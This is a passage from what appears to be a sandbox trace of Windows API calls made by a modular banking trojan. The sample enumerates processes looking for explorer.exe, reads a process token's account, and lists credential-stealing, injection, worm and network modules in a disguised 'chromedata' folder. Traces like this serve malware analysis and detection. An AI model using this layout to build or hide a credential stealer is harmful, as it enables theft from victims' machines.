	[0243.234] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0243.235] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0243.235] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0243.283] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0243.283] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0243.284] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0243.284] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.285] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.285] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.286] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.286] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.287] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.287] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.288] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.288] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0243.288] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0243.288] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.289] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.289] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.290] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.290] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0243.291] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0243.291] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0243.292] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0243.292] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0243.293] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0243.293] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.294] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.294] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0243.294] CloseHandle (hObject=0x6e4) returned 1
	[0243.295] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffdb0
	[0243.295] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe28
	[0243.295] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311d68
	[0243.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x6e4
	[0243.295] OpenProcessToken (in: ProcessHandle=0x6e4, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x264) returned 1
	[0243.295] GetTokenInformation (in: TokenHandle=0x264, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0243.295] GetLastError () returned 0x7a
	[0243.295] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x27dae60
	[0243.295] GetTokenInformation (in: TokenHandle=0x264, TokenInformationClass=0x1, TokenInformation=0x27dae60, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x27dae60, ReturnLength=0x128c98) returned 1
	[0243.295] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x27dae68*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0243.295] CloseHandle (hObject=0x264) returned 1
	[0243.295] CloseHandle (hObject=0x6e4) returned 1
	[0243.295] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737e08
	[0243.295] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffdb0) returned 1
	[0243.296] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737e30
	[0243.296] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffdb0
	[0243.296] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311c60
	[0243.296] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0243.296] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0243.296] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0243.296] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0243.296] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0243.296] lstrcmpiW (lpString1="wormDll32", lpString2="pwgrab32") returned 1
	[0243.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737e30) returned 1
	[0243.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311c60) returned 1
	[0243.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffdb0) returned 1
	[0243.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe28) returned 1
	[0243.296] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2251f8
	[0243.296] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0243.296] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0243.296] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0243.296] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0243.296] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0243.296] GetExitCodeThread (in: hThread=0x6d4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0243.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2251f8) returned 1
	[0243.296] Sleep (dwMilliseconds=0x4e20) 
	[0243.331] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.331] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0243.331] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0243.331] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0243.331] CloseHandle (hObject=0x6e4) returned 1
	[0243.331] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.331] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0243.331] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0243.332] CloseHandle (hObject=0x6e4) returned 1
	[0243.332] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.332] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0243.332] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0243.332] CloseHandle (hObject=0x6e4) returned 1
	[0243.332] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.332] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0243.332] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0243.332] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0243.332] CloseHandle (hObject=0x6e4) returned 1
	[0243.332] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.333] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0243.333] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0243.333] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0243.333] CloseHandle (hObject=0x6e4) returned 1
	[0243.333] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.333] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0243.333] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0243.333] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0243.333] CloseHandle (hObject=0x6e4) returned 1
	[0243.333] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.333] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0243.333] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0243.333] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0243.334] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0243.334] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6a40
	[0243.334] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0243.334] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0243.334] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe28
	[0243.334] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x234f30
	[0243.334] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0243.334] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0243.334] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffe28, Size=0x10) returned 0x22ffdb0
	[0243.334] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22b6298
	[0243.334] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0243.334] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0243.334] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffdb0, Size=0x10) returned 0x22ffe28
	[0243.334] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22caa30
	[0243.334] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0243.334] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0243.334] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffe28, Size=0x10) returned 0x22ffdb0
	[0243.334] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2738590
	[0243.334] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0243.334] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0243.334] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffdb0, Size=0x20) returned 0x2737e30
	[0243.334] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24a3b8
	[0243.334] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
